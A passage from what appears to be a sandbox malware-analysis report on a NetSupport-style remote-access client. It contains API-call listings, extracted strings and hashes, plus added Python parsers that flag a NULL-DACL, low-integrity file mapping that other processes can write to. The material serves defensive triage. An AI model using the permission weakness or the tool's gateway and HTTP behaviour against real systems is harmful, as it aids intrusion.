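    sd = {"owner": None, "group": None, "dacl": None, "sacl": None}
    # Each component starts with O:, G:, D: or S: and runs until the next such marker.
    for chunk in re.findall(r"[OGDS]:(?:(?![OGDS]:).)*", sddl.replace(" ", "")):
        key, _, value = chunk.partition(":")
        if key in ("O", "G"):
            sd["owner" if key == "O" else "group"] = _sid(value)
        else:
            sd["dacl" if key == "D" else "sacl"] = _acl(value)
    return sd

def assess_ipc_object(sddl: str) -> dict:
    """Summarise who can read and write a named kernel object created with this descriptor."""
    sd = parse_sddl(sddl)
    out = {"null_dacl": False, "label": None, "policy": (), "min_writer_integrity": "Untrusted",
           "findings": []}
    if sd["dacl"] is None:
        out["findings"].append("no DACL supplied: the object gets the creator's default DACL")
    elif sd["dacl"]["null"]:
        out["null_dacl"] = True
        out["findings"].append("NULL DACL: the discretionary check grants every SID full access")
    for ace in (sd["sacl"] or {"aces": ()})["aces"]:
        if ace.ace_type != "SYSTEM_MANDATORY_LABEL":
            continue
        out["label"], out["policy"] = INTEGRITY.get(ace.sid, ace.sid), ace.rights
        # NO_WRITE_UP only blocks writers *below* the label; with a Low label that is just Untrusted.
        if "SYSTEM_MANDATORY_LABEL_NO_WRITE_UP" in ace.rights:
            out["min_writer_integrity"] = out["label"]
        out["findings"].append(f"mandatory label {out['label']}, policy {', '.join(map(str, ace.rights))}")
    if out["null_dacl"]:
        out["findings"].append(f"net effect: any process at {out['min_writer_integrity']} integrity "
                               "or above can read and write the object")
    return out
```

assess_ipc_object(OBSERVED_SDDL) returns null_dacl True, label Low and min_writer_integrity Low, i.e. the mapping is open to every process that is not Untrusted; the same function can be pointed at descriptors pulled from other reports or dumped from a live system with ConvertSecurityDescriptorToStringSecurityDescriptor. One caveat when reading this particular run: GetVersionExA sits between the DACL and SACL steps in the block order, and the executed/not-executed colouring that would show whether the low-integrity label branch was taken did not survive extraction.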
                                                                                  APIs
                                                                                    • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,50D94AA1,00080000,00000000,?), ref: 1109D88D
                                                                                    • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                    • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                    • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,50D94AA1,00080000,00000000,?), ref: 1109E645
                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                  • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                  • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                  • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                  • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                  • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                                  • GetLastError.KERNEL32 ref: 1109E75D
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                  • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                    • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                    • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                  • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                  • _memset.LIBCMT ref: 1109E920
                                                                                  • GetTickCount.KERNEL32 ref: 1109E928
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                  • GetLastError.KERNEL32 ref: 1109EA44
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                  • GetLastError.KERNEL32 ref: 1109EA89
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                  • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                  • GetLastError.KERNEL32 ref: 1109EACF
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                  • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                  • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                  • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                  • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                  • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                  • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                  • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                  • API String ID: 3291243470-2792520954
                                                                                  • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                  • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                  • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                  • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

                                                                                  Control-flow Graph (rendered graph; node and edge data not reproduced)

                                                                                  APIs
                                                                                    • Part of subcall function 6F9F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6F9F2ACB
                                                                                    • Part of subcall function 6F9F2A90: _strrchr.LIBCMT ref: 6F9F2ADA
                                                                                    • Part of subcall function 6F9F2A90: _strrchr.LIBCMT ref: 6F9F2AEA
                                                                                    • Part of subcall function 6F9F2A90: wsprintfA.USER32 ref: 6F9F2B05
                                                                                    • Part of subcall function 6FA0DBD0: _malloc.LIBCMT ref: 6FA0DBE9
                                                                                    • Part of subcall function 6FA0DBD0: wsprintfA.USER32 ref: 6FA0DC04
                                                                                    • Part of subcall function 6FA0DBD0: _memset.LIBCMT ref: 6FA0DC27
                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6FA07057
                                                                                  • InitializeCriticalSection.KERNEL32(6FA3B898), ref: 6FA070DF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA070EF
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA07115
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6FA0713B
                                                                                  • WSAStartup.WSOCK32(00000101,6FA3B91A), ref: 6FA07167
                                                                                  • _malloc.LIBCMT ref: 6FA071A3
                                                                                    • Part of subcall function 6FA11B69: __FF_MSGBANNER.LIBCMT ref: 6FA11B82
                                                                                    • Part of subcall function 6FA11B69: __NMSG_WRITE.LIBCMT ref: 6FA11B89
                                                                                    • Part of subcall function 6FA11B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6FA1D3C1,6FA16E81,00000001,6FA16E81,?,6FA1F447,00000018,6FA37738,0000000C,6FA1F4D7), ref: 6FA11BAE
                                                                                  • _memset.LIBCMT ref: 6FA071D3
                                                                                  • _calloc.LIBCMT ref: 6FA07214
                                                                                  • _malloc.LIBCMT ref: 6FA0728B
                                                                                  • _memset.LIBCMT ref: 6FA072C1
                                                                                  • _malloc.LIBCMT ref: 6FA072CD
                                                                                  • _memset.LIBCMT ref: 6FA07303
                                                                                  • GetTickCount.KERNEL32 ref: 6FA07361
                                                                                  • CreateThread.KERNEL32(00000000,00004000,6FA06BA0,00000000,00000000,6FA3BACC), ref: 6FA0737E
                                                                                  • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6FA073AC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\,00000104), ref: 6FA07430
                                                                                  • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\pci.ini), ref: 6FA074B0
                                                                                  • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6FA074C0
                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6FA07566
                                                                                  • timeBeginPeriod.WINMM(00000001), ref: 6FA07573
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                  • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$648351$C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\$C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                  • API String ID: 3160247386-3101628296
                                                                                  • Opcode ID: 006c9210d32aa53bb0c9ba9be0e33eaae5798b684290b40cf2773176055501f2
                                                                                  • Instruction ID: 2945255b5aaf11ce11415c66d41636db99c97e272153fc60387b9fc7b6d655ac
                                                                                  • Opcode Fuzzy Hash: 006c9210d32aa53bb0c9ba9be0e33eaae5798b684290b40cf2773176055501f2
                                                                                  • Instruction Fuzzy Hash: FCD1DAB3D00724AFDB20AF74BC809567BE9FB1635CB44852AF449D7281E739E8D18B91

                                                                                  Control-flow Graph (rendered graph; node and edge data not reproduced)

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll,50D94AA1,762323A0,?,00000000), ref: 11029BE5
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                  • _malloc.LIBCMT ref: 11029CB7
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                  • GetLastError.KERNEL32 ref: 11029CF2
                                                                                  • _free.LIBCMT ref: 11029CFE
                                                                                  • _malloc.LIBCMT ref: 11029D07
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                  • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                  • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                  • _free.LIBCMT ref: 11029DA5
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                  • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                  • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                  • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                  • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                  • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                  • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                  • API String ID: 921868004-913974648
                                                                                  • Opcode ID: 7601ca86afd039ac015f256548e9b1f80adfdfe6b294cebcb07e0e75b36e1d34
                                                                                  • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                  • Opcode Fuzzy Hash: 7601ca86afd039ac015f256548e9b1f80adfdfe6b294cebcb07e0e75b36e1d34
                                                                                  • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                  APIs
                                                                                    • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                    • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                  • _fgets.LIBCMT ref: 110628E2
                                                                                  • _strpbrk.LIBCMT ref: 11062949
                                                                                  • _fgets.LIBCMT ref: 11062A4C
                                                                                  • _strpbrk.LIBCMT ref: 11062AC3
                                                                                  • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                  • _fgets.LIBCMT ref: 11062B55
                                                                                  • _strpbrk.LIBCMT ref: 11062B7B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                  • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                  • API String ID: 716802716-1571441106
                                                                                  • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                  • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                  • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                  • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                   Control-flow Graph: function at 6f9fa980 (graph image and its executed / not-executed block colouring are not reproduced in this text export)
                                                                                  APIs
                                                                                    • Part of subcall function 6F9F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6F9F8F91,00000000,00000000,6FA3B8DA,?,00000080), ref: 6F9F5852
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,?,00000000,00000000), ref: 6F9FAA11
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA58
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA68
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAA94
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6F9FAB0B
                                                                                  • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB4E
                                                                                  • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB5A
                                                                                  • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB8E
                                                                                  • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FABB1
                                                                                  • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FABE3
                                                                                  • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC18
                                                                                  • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC21
                                                                                  • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC29
                                                                                  • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC65
                                                                                  • WSASetBlockingHook.WSOCK32(6F9F63A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC76
                                                                                  • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC8F
                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC96
                                                                                  • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC9C
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FACFD
                                                                                  • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD04
                                                                                  • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD0A
                                                                                  • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD45
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAD4F
                                                                                  • InitializeCriticalSection.KERNEL32(-6FA3CB4A), ref: 6F9FADE6
                                                                                    • Part of subcall function 6F9F8FB0: _memset.LIBCMT ref: 6F9F8FE4
                                                                                    • Part of subcall function 6F9F8FB0: getsockname.WSOCK32(?,?,00000010,?,03022F58,?), ref: 6F9F9005
                                                                                  • getsockname.WSOCK32(00000000,?,?), ref: 6F9FAE4B
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898), ref: 6F9FAE60
                                                                                  • GetTickCount.KERNEL32 ref: 6F9FAE6C
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 6F9FAE7A
                                                                                  Strings
                                                                                  • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6F9FAD14
                                                                                  • Connect error to %s using hijacked socket, error %d, xrefs: 6F9FAB17
                                                                                  • Cannot connect to gateway %s, error %d, xrefs: 6F9FACA6
                                                                                  • *TcpNoDelay, xrefs: 6F9FABB8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                   • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                  • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                  • API String ID: 692187944-2561115898
                                                                                  • Opcode ID: b2b13355eaa1018d05f8961f4526e08ccf39222af1bbc9baabb3709cd2517d90
                                                                                  • Instruction ID: 310f1a58c7634c34b4856b0c8341217c646bc472b9202bd9e11b0cef6c2051a1
                                                                                  • Opcode Fuzzy Hash: b2b13355eaa1018d05f8961f4526e08ccf39222af1bbc9baabb3709cd2517d90
                                                                                  • Instruction Fuzzy Hash: 9DE19031A052199FDB10DF64DD80BEDB3B9EF49314F1041AAE909D72C0DB34E995CB91
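The two function listings above (the WinInet loader that resolves InternetConnectA / HttpOpenRequestA / HttpSendRequestA by name, and the gateway connector that calls socket, setsockopt by ordinal #21, bind and WSASetBlockingHook) are printed by the sandbox as raw argument stacks in hex. Turning those lines into structured records, with the Winsock and WinInet constants decoded, is a useful triage step when many such reports have to be scanned. The parser below is an added example and is not part of the Joe Sandbox report or of the NetSupport client it analyses. It assumes the listing line shape shown on this page (bullet, `API.MODULE(args), ref: address`), that wsock32 ordinal #21 is setsockopt (the standard Winsock export table, consistent with the `*TcpNoDelay` string next to that call), and that only the callee's own parameters are meaningful, the trailing values being whatever else was on the stack. The sample lines are copied from the listings above.

```python
"""Parse Joe Sandbox 'APIs' listing lines and decode the WinSock / WinInet
arguments they record. Added example, not part of the report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the shape the report prints (bullet, API.MODULE(args), ref: address).
SAMPLE_APIS = """\
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
• InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
• GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
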